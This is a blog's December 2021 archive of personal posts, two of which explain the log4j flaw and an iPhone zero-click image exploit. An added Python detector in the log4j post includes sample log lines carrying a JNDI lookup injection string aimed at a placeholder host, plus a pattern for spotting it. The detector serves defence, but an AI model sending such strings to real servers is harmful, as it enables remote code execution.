
Symbolic Forest

A homage to loading screens.

Blog : Posts from December 2021

The calendar rolls around again

Or, the end of the year

It’s Hogmanay, or nos Calan,* or New Year’s Eve if you’re English.

In some previous years I’ve done a big summary round-up of exciting things and powerful memories from the past year. In at least one, I even did a week or so of posts counting down my top five memories of the year. 2021? Nope, I’m not doing that. Not because nothing has happened, not at all, but almost because too much has happened. I moved house twice. I met one of my best friends face-to-face for the first time. I changed jobs. I went for walks on the beach a lot. Most important of all, though, I gained confidence. I gained enough confidence in myself to look at who I really am, what has held me back in the past, and start to sort out some of those things.

So this post, then, is not about looking back, because I’ve spent a lot of time doing that over the past year and I know that I don’t have a time machine. I know I can’t go back to 2003, or 2006, or any other arbitrary point in my life. This post is about looking forward, because in 2022 there are going to be even more changes in my life. Changes that I’m going to take the lead on, be in control of, and that will put me in a position where I can live a happier life.

At some point in the next year I will ramble on about this a lot more, I’m sure, and explain more about where I’ve come from and where I’m going to. For now, to you the reader, this is all unsubstantial mist, I know. It won’t always be. For now, happy new year, blwyddyn newydd dda, and here’s to a better 2022. I know mine will be better, and I hope yours is too.

* It’s only just occurred to me that the Welsh word “calan”, meaning the first of the month or year, is a direct remnant of the old Roman word kalendae, from which the English word “calendar” is derived.

The turn of the year

The end of one, and the start of the next

It’s that time for the seasons to turn again. Today is the shortest day, and the solstice itself is this afternoon, here. It’s just a little bit after sunset here this year, which is nothing more than coincidence but seems rather apt.

This has been a big year, and a strange year. It’s been a year of many changes, changes I didn’t see coming but which have been embedded inside me all along. Mentally, I feel in some ways as if I’ve been working back through my own personal history, picking and teasing at it and unlocking all the mysteries which have been kept trapped inside myself for so long. Although it’s been a year of many changes, I feel as though there may be even more to come.

If it’s a clear sky tonight, I will sit outside and look for meteors, because the last few from the Geminid shower might still be visible. It probably won’t be clear, I have to say, because it’s been rather foggy here recently. Still, I can hope.

I’m posting this early in the morning whilst it’s still dark, drinking my morning cup of tea, and then I’ll be at my desk working all day fixing the various bugs I caused yesterday, because Christmas isn’t until the end of the week. But for me, this is the start of the holiday season, the turning point, the time to settle down in the darkness, to eat and drink and celebrate, and start to turn the world around.

Teaching an image to think

Computers work in unexpected ways

Following on from yesterday’s post about log4j: another security article fascinated me in the last week, too. You might have already seen it, because it was widely shared on Twitter and computer people everywhere were amazed and aghast at its engineering and its possibilities. The log4j vulnerability is a relatively pedestrian one by comparison, using something that is an entirely documented and public feature of the library. This, on the other hand, is a completely different animal.

It’s a hack which lets you run code on a stranger’s iPhone just by sending them a message. They don’t have to click on anything, they don’t even have to open it, all their phone has to do is receive it and the hacker can take their phone over. At least, could: this security hole was fixed three months ago in iOS 14.8 and later. If you are running an older version of iOS on your phone or tablet, then, er, maybe don’t. The analysis of how this hack works, by Google Project Zero, has started to be published; and if you’re a programming nerd, it is beautiful and amazing and horrific in just the same way that a biological virus is.

In short, this hack relied on the fact that an iOS device, when it receives an animated GIF, tries to hack the GIF a little so it will always loop forever whatever the GIF itself actually says to do. It does this in an unhealthy way, though. When it opens the file to change it, it doesn’t matter if it’s not actually a GIF. The software will try to be clever and say “ah, looks like your file’s got the wrong name there, don’t worry, I still know how to open one of these” and do it. Even if it’s not a GIF and therefore doesn’t really need to.

Secondly, the hack relies on a bug in an open source PDF-reading library, in the part of the code used to open embedded images that are in an obscure and rather out-of-date format mostly used by fax machines. PDF is a big, complex and rambly format (believe me I know, I’ve been on-off trying to write a .NET PDF writing library for some years now) so it’s not surprising there are bugs and holes in PDF-reading software. What this hack does, though, is frankly brilliant. It uses the capabilities of the compression algorithm of this particular graphics format to implement an entire virtual CPU in the memory of the target device. It’s a small CPU but it is a Turing-complete one, which in technical terms means that if you ignore practical limits of time and memory, it’s just as powerful as any other computer. An entire virtual CPU…created by feeding a carefully-designed image into a buggy image decompression routine.*

Frankly, if you’re a software developer, this is genius. Evil genius, to be sure, but genius nonetheless. I’m somewhat in awe of it, in a dirty way. It’s a wonderful level of lateral thinking, to know that the bug is there to exploit and work out a way to reach it and trip it up to begin with; and then to build an entire virtual machine from the basic Boolean logic operations available inside a particular image format. As I said above, it’s beautiful, it’s amazing, and it’s horrific in the original sense of the word. It’s awe-inspiring. I might be good at my job, but I can only look upon this with amazement and envy.

* I assume the image itself looks like just so much white noise if you could actually view it, but you can’t have everything. It reminds me a little of Neal Stephenson’s early-90s novel Snow Crash, in which a carefully-designed image that looks like white noise can hack the viewer’s brain.
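
To make the "basic Boolean logic operations" point concrete, here is an added illustration (not code from the original post or from the Project Zero analysis). The fax-era format in question, JBIG2, lets one bitmap region be combined onto another with AND, OR, XOR or XNOR; the toy model below uses only those four operations to add and subtract 8-bit numbers, the sort of building block a CPU is assembled from. The canvas layout and every function name are assumptions made for the example.

```python
# Toy model: a "canvas" is a flat list of bits, and the ONLY way to compute
# is combine(), which mirrors the four bitmap combination operators.
WIDTH = 8                                    # bits per toy "register"
A, B, OUT = 0, WIDTH, 2 * WIDTH              # register offsets (little-endian)
CARRY, T1, T2 = 3 * WIDTH, 3 * WIDTH + 1, 3 * WIDTH + 2   # scratch bits
SIZE = 3 * WIDTH + 3

OPS = {
    "AND":  lambda d, s: d & s,
    "OR":   lambda d, s: d | s,
    "XOR":  lambda d, s: d ^ s,
    "XNOR": lambda d, s: 1 - (d ^ s),
}

def combine(canvas, dst, src, op, n=1):
    """canvas[dst:dst+n] = canvas[dst:dst+n] OP canvas[src:src+n]."""
    for i in range(n):
        canvas[dst + i] = OPS[op](canvas[dst + i], canvas[src + i])

def copy(canvas, dst, src, n=1):
    combine(canvas, dst, dst, "XOR", n)      # x XOR x = 0 clears the target
    combine(canvas, dst, src, "OR", n)       # 0 OR src = src

def ripple_add(canvas):
    """OUT = A + B + CARRY using only combine(); carry-out stays in CARRY."""
    for i in range(WIDTH):
        copy(canvas, T1, A + i)
        combine(canvas, T1, B + i, "XOR")        # T1 = a ^ b
        copy(canvas, OUT + i, T1)
        combine(canvas, OUT + i, CARRY, "XOR")   # sum bit = a ^ b ^ carry
        combine(canvas, T1, CARRY, "AND")        # T1 = (a ^ b) & carry
        copy(canvas, T2, A + i)
        combine(canvas, T2, B + i, "AND")        # T2 = a & b
        copy(canvas, CARRY, T1)
        combine(canvas, CARRY, T2, "OR")         # next carry

def load(canvas, offset, value):
    """Input setup only: place an integer's bits into a register."""
    for i in range(WIDTH):
        canvas[offset + i] = (value >> i) & 1

def read(canvas, offset):
    return sum(canvas[offset + i] << i for i in range(WIDTH))

def add(x, y):
    canvas = [0] * SIZE
    load(canvas, A, x)
    load(canvas, B, y)
    combine(canvas, CARRY, CARRY, "XOR")     # carry-in = 0
    ripple_add(canvas)
    return read(canvas, OUT), canvas[CARRY]

def sub(x, y):
    """x - y as x + NOT(y) + 1 (two's complement), modulo 2**WIDTH."""
    canvas = [0] * SIZE
    load(canvas, A, x)
    load(canvas, B, y)
    combine(canvas, OUT, OUT, "XOR", WIDTH)  # OUT = all zeros
    combine(canvas, B, OUT, "XNOR", WIDTH)   # b XNOR 0 = NOT b
    combine(canvas, CARRY, CARRY, "XNOR")    # x XNOR x = 1: carry-in = 1
    ripple_add(canvas)
    return read(canvas, OUT)
```

Nothing here touches memory it should not; the real exploit needed the decoder bug to let those same operations reach beyond the image buffer.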

Some logical relief

In which we discuss a topical flaw

In many ways I lead a charmed life and hold a wide range of privileges in my hand. Not least, this week just gone, the fact that I’m a software developer who generally works with the .NET software stack. More specifically, I am not a software developer who works with Java. Java developers have not, generally speaking, been having a good week.

This is all because of a software vulnerability discovered just over a week ago in a Java library called “log4j”. To summarise, for non-experts: “log4j” is a logging library. No, not the let’s-clear-the-rainforests sort. “Logging” means your software writing diagnostic information as it goes along: records such as “user etoainshrdlu asked to see their bank balance at 9.10am from this address with that web browser”. You can see why…

Regular reader E Shrdlu (from Clacton) writes: Oi! You can’t go around giving my bank balance to people!

Hush now, I was just using you as an example! You can see why it’s useful to have this information stored away somewhere, and log4j is a software library that makes it really easy to do. Virtually all Java server-side code out there uses log4j somewhere inside it, to handle this sort of thing.

Unfortunately, log4j has a few handy features that were originally intended to be useful features, but aren’t necessarily a good idea to have running on an internet-facing server that does important work such as process your banking requests. Particularly, in this case, if you put a certain specialist type of URL into a log record, log4j will see it, try to download another program from it, and will then run that program in a certain well-defined way. Of course, you might say, there’s nothing wrong with that because all of the log record messages are just written by the bank’s own software developers, so everything’s perfectly safe. However, as I said above, one thing they may very well be logging is which browser you happen to be using, because that’s very useful diagnostic data if people start having problems. “Which browser you happen to be using”, though, is just a field that you send them, and if you know what you’re doing, you can change it to whatever you want to. Including a special type of URL which will…well, hopefully you get the picture. And now you’re running whatever programs you like on one of your bank’s internal servers. Ah. You can see now why Java developers have not been having a good week.

The fix for this is straightforward, but rolling the fix out will have involved a huge proportion of the Java code running in the world being checked, double-checked, and redeployed when it’s known to be safe. Moreover, all of the developers doing this will have had several queries a day from their managers asking just how much they are exposed to this issue. I know: I’ve had several myself, even though my response is straightforwardly “we don’t run any Java code at all, so don’t worry.” I do tell them to tell the clients we have thoroughly and conscientiously audited our systems because from a client-relations point of view it does sound a bit more professional than “no, and our tech lead is very glad of her career choices”. But it still means plenty of messages for me to answer.

Incidentally, I don’t feel any sort of schadenfreude about this, in case you were wondering. I genuinely feel sorry for a lot of people I know, who will not have had a good week fixing this stuff. I’ve worked in big banks and other similar organisations, and I know a lot of former colleagues and current friends who will have spent the last week focusing on this above all else. It’s not nice when you are suddenly bowled by a risk like this; and moreover, it’s not as if Java is uniquely likely to suffer from this type of problem. There are nuances to this that I may come back to in a later post; but next time something like this happens, the person fixing it might well be me.
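
For anyone on the answering-the-manager side of this, the "field that you send them" above suggests an obvious check, shown here as an added example (not from the original post): scan web access logs for log4j lookup syntax, which starts with `${`, in the fields a client controls. The log lines, addresses and host names are constructed placeholders, and the function names are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format); all values are placeholders.
SAMPLE_LOG = '''\
198.51.100.7 - - [13/Dec/2021:09:10:02 +0000] "GET /balance HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"
203.0.113.9 - - [13/Dec/2021:09:10:05 +0000] "GET / HTTP/1.1" 200 128 "-" "${jndi:ldap://placeholder.invalid/a}"
203.0.113.9 - - [13/Dec/2021:09:10:06 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fplaceholder.invalid%2Fa%7D HTTP/1.1" 200 128 "-" "curl/7.79.1"
192.0.2.44 - - [13/Dec/2021:09:11:40 +0000] "GET / HTTP/1.1" 200 128 "-" "probe ${date:yyyy}"
'''

LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
CLIENT_FIELDS = ("request", "referer", "agent")   # all attacker-controlled
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def fully_unquote(value, rounds=3):
    """Undo percent-encoding, repeating a few times to catch double encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return None for clean input, otherwise the kind of lookup syntax seen."""
    decoded = fully_unquote(value)
    if "${" not in decoded:
        return None
    # No legitimate browser sends "${", so any occurrence is worth flagging;
    # that also covers nested or disguised forms without enumerating them.
    return "jndi-lookup" if JNDI.search(decoded) else "lookup-syntax"

def scan(log_text):
    """Return (client_ip, field, kind) for every suspicious client field."""
    findings = []
    for line in log_text.splitlines():
        match = LINE.search(line)
        if not match:
            continue
        for field in CLIENT_FIELDS:
            kind = classify(match.group(field))
            if kind:
                findings.append((match.group("ip"), field, kind))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that someone tried; whether anything happened depends on whether a vulnerable log4j version actually logged that field.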

Ahead of the curve

On never really understanding the popularity of something

It’s shaping up to be another quiet month on here. December is the tiredest month, after all: next week it’s Christmas itself, last week it was the office party, and in between I am at home worrying whether all the presents will get delivered in time. Time, then, to pull another old post from the backlog of drafts and get it into some sort of shape.

On Twitter over the past couple of years, it seems as if some arguments or some topics seem to come around, be propelled back into the spotlight, on a very routine and predictable schedule. An example in point: the multimillionaire writer Joanne Rowling, who seems to be unable to avoid the temptation to say controversial things on the internet which seem to have alienated huge swathes of her previous fanbase. As I said, Rowling is a multimillionaire, multimillionaires can afford expensive lawyers, and as such I am carefully stepping around the things she has said—which I, personally, have found genuinely very offensive—without describing or repeating them. In any case, offensive words are best left to wither away and drift off unheard into the wind.

The point of this post, though, is to write more about Rowling’s work than her political beliefs. It’s to say, out loud, something I’ve hinted at on here before, but never actually said out loud for fear of offending people. A dark secret, you could call it. I don’t have to go around throwing Potter merchandise or books in the bin, because I’ve never really thought Harry Potter was very good.

There, I said it. Harry Potter was never actually very good. I’ve kept quiet about this because I’ve had various close friends who, absolutely, adored it. My ex-partner H, for example, who had me take her to a midnight book launch event for the final book. Or Colleague Em, who I went to see one of the films with. I’ve still never seen all of the films, but did like their aesthetic* and did somewhat admire the way they turned a sow’s ear into, maybe not a silk purse, but something much more focused and better-structured than their source material.

My first memory of Harry Potter, the book series, is of seeing displays of the books in Waterstones in Edinburgh, back when the cover of the first was a slightly cartoonish drawing showing a steam train next to a modern InterCity one, so you can understand why it piqued my interest. I didn’t really find out what it was about, though, until a year or two later when the hype machine had started to kick in, and you started to see newspaper articles about how adults were furtively reading this “children’s book” on their morning commute. Part of that machine, you might have heard, was the whole story that she wrote the first book sitting in cafes in Edinburgh whilst living as a penniless single mother.

It was at this point I started to become wary. Back then, these stories often didn’t just talk about generic “Edinburgh cafes”. They talked about one specific cafe, Nicolsons, on the corner of Nicolson St and Drummond St. I knew it well: I spent four years studying within a stone’s throw of it, some of those years living within a stone’s throw of it too. I say “I knew it well”: I mean, I walked past it several times per day, and if you’d asked me directions to it, I’d have done fine. I went in it exactly once, the whole time I lived in Edinburgh, because when I lived there, it was the posh cafe in the area. It was the one that gave you mini doughnuts when you ordered a hot chocolate. It was certainly not one I could afford to go to very often. If I wanted to eat out I’d go to the City Restaurant,** or to a greasy spoon in Nicolson Square where I once received an unexpected shower from a sudden leak in the ceiling above me. If I wanted a coffee, I’d go home. Nicolsons? Too expensive for a student, even one with a grant and a part-time job. So I’ve always been somewhat suspicious.

Only today, as it happens, doing background reading for this blog post I discovered that Nicolsons belonged to someone in Rowling’s family at the time, and all of a sudden the story, or rather the promotion of the story, begins to make a little sense. I didn’t know that back at the time, of course; and a year or so before I left Edinburgh Nicolsons closed and was replaced with a Chinese restaurant. Other Edinburgh cafes picked up the mantle of claiming to be “the place where Harry Potter was written,” much as almost every town in Britain has a “Charles Dickens slept here” plaque if you look hard enough.

Aside from the whole question of where it was written, and how genuine that story was—which is somewhat irrelevant to the content of the books themselves—I was left entirely cold by descriptions of the story. Now, I can understand reading (or writing) books about magic. I can understand wanting to read P G Wodehouse, or to an extent even Enid Blyton.*** I was baffled by the concept of somebody wanting to write a school story in the modern, forward-thinking and progressive 1990s. Particularly a school story in which the boarding school itself was the place of safety, of order and authority, and of home. A book that posits that setting must surely be a deeply reactionary, conservative book, whichever political party the author is giving money to. Without ever reading the book, I already knew that much. As we’ve seen over the twenty-something years since, it turned out to be right.

You can see echoes of Rowling’s recent behaviour early on, in her response to whether or not it made sense for Kings Cross station to have a Platform 9 3/4, when at Kings Cross—like most large UK stations off the top of my head—platforms 9 and 10 face each other across a pair of tracks, rather than being back to back. From memory: her response was that she’d been thinking of Euston, from a time in her life when she regularly caught the train from there to Manchester. Which is fair enough, except that at Euston platforms 9 and 10 also face each other across a pair of tracks; and they’re only used by the local trains to Watford.**** It seemed odd at the time to double down rather than admit to a mistake or—as you might expect an author to do—admit to inventing something fictional in which the details don’t need to be strictly real and parallel with the real world. Nowadays, it seems more characteristic.

Harry Potter was an important part of many of my peers’ formative years. They—the ones that are my friends, at least—have distanced themselves from Rowling’s politics, and have learned to detach the art from its creator, much as I try to listen to the music of The Smiths without thinking of the politics of the lyricist. I don’t feel any pride in always being a wee bit suspicious of it, or in spotting these holes early on. Nevertheless, it does give me a slight advantage. Never having been fully into it, I don’t have to dissociate myself from it now. That’s something, I suppose.

* although A Series Of Unfortunate Events did the same aesthetic, better.

** Everyone who has lived on the South Side knows the City Restaurant; it’s an institution, although when I arrived in Edinburgh there were people who genuinely told me it just hadn’t been the same since they changed the chip fat in 1995.

*** I should add, I’ve never read any of Blyton’s “school stories”; the Famous Five books are all “what we did in our holidays” stories. I wondered even at primary school age, if you counted up the number of Famous Five books and the number of school holidays you get per year, surely they must be into their twenties by the end?

**** Edinburgh didn’t even really have a platform 9 back when Harry Potter was being written, in case you were wondering if that was the source. Back then, the only platform numbers under 10 were 1 and 7, a relict of the way train services eastwards and southwards from Edinburgh had been cut back in the 1960s. The track for platforms 8 and 9 survived, as little stubs used in the daytime to store the engines used by some of the overnight sleeping car trains to the north of Scotland which split or joined portions in Edinburgh in the middle of the night.

Finally, spring

In which The Mother is persuaded a fresh start might come in handy

For years, The Mother has been telling me the house needs cleaning out. “It’ll be too late when I’m gone,” she has said. “You should get started on it now.” And I should get started on it, of course, because for years she has had the false assumption that all of the mess and clutter in the house is mine, or is my fault somehow. This is patently untrue. Things, for example, in my bedroom right now include:

  • a vacuum cleaner
  • a steam cleaner
  • a late 90s CRT monitor (large)
  • a box of parish church paperwork
  • a set of suitcases
  • a set of cigarette cards (framed)
  • several large bags full of used jiffy bags, just in case they came in useful one day

None of these things, you have probably guessed, are actually mine.

Until recently, my bedroom also contained a pull-along shopping trolley, a considerable quantity of winter coats, and a mid-80s portable CD player, the first one my family owned. That, at least, I can claim some responsibility for, as it was my main means of listening to music in my teens. Still, no need for it to be there now. It’s time to bite the bullet, I decided. Time to actually persuade The Mother to get rid of something.

I loaded the coats into a bag, put the CD player in the back of the car, and took the trolley down to the kitchen to start loading it up with unnecessary stuff. Now, the kitchen is full of unnecessary stuff. The Mother has never seen a flat surface without wanting to hoard things on it, so virtually all of the kitchen countertops are covered in piles and piles of things: food that she hasn’t put into the cupboard, crockery that she hasn’t put away, stacks of empty takeaway containers that have been kept just in case they “come in useful”. I start loading the empty plastic into a recycling box.

“You can’t throw those out!” says The Mother, who has crept up behind me. “I’m saving those for your uncle!”

“When is he coming to collect them?” I ask. “They’ve not moved for a few months.”

“Well he comes now and again,” she replies, “and he said he uses plastic tubs to keep them in.”

“He can buy takeaways too, though,” says I, and they go. Behind them I discover gadgetry I’ve never even seen: a slow cooker, and a Nutribullet.

“I didn’t know you had a Nutribullet,” I say.

“What’s a Nutribullet?”

“It’s grey,” I say, because I’m not feeling in a particularly familial, caring mood, “and it says ‘Nutribullet’ on the side. You use it to make smoothies.”

“Oh we tried it,” she replies, “and I used it to make soup. But it was too much of a faff. It’s a right pain to clean.”

“Which is what 99% of people who buy a Nutribullet say,” I told her. “It’s going to the shop too.”

So, out of the house went: the Nutribullet, a coffee machine, the coats, the ancient CD player, a stack of CDs of Dad’s that nobody else in the family wanted, and about a third of The Mother’s excessively large supply of plain, cheap, white coffee mugs. She bought a bulk order, a few years back, so that when my dad’s old colleagues came to see him and have a natter, she could give them some cheap crockery she didn’t care about. I removed a third, on the theory that The Mother doesn’t actually know how many there are and never sees them all in one place; and so far, it seems to be working. The charity shop people were extremely excited about the CD player, it being a vintage piece, but as yet its highest bid is still under a fiver.

Naturally, the house looks barely changed. One car-load, after all, isn’t going to make a dent in many decades worth of hoarding—there is stuff hoarded by my grandparents that has been passed down the line, a line which I am going to be the one to break. Still, psychologically, it’s definitely a start.